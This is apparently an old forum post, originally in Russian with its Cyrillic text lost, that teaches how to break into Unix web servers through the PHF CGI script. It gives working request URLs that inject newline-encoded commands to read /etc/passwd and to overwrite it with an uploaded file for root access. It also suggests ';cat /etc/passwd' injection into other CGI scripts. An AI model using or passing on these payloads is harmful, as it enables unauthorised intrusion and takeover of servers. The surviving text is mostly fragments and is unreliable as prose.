, 12 2006 . 01:52
+
WWW : Unix, .. Unix, , .
, , passwd /etc. ( ), . passwd , telnet' exploits. .
, . passwd - PHF. .. :
www.***.ru/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd phf cgi-bin, passwd. %0a - . - enter. /bin/cat%20/etc/passwd - /bin/cat etc/passwd. cat - . passwd /etc. cat, : ls ( ), id ( ), rm ( ) .. id, - root, !
- . , root, passwd , Root. FTP ( income). ls ( /home/local/ftp/income).
www.***.ru/cgi-bin/phf?Qalias=x%0a/bin/cp%20/home/...tp/income/passwd%20/etc/passwd .. passwd, ! Root!!!
. , CGI , passwd. .. , (cat, ls, rm...). , - mail ( !). ;cat /etc/passwd passwd, ;>|< .., OK! finger. br>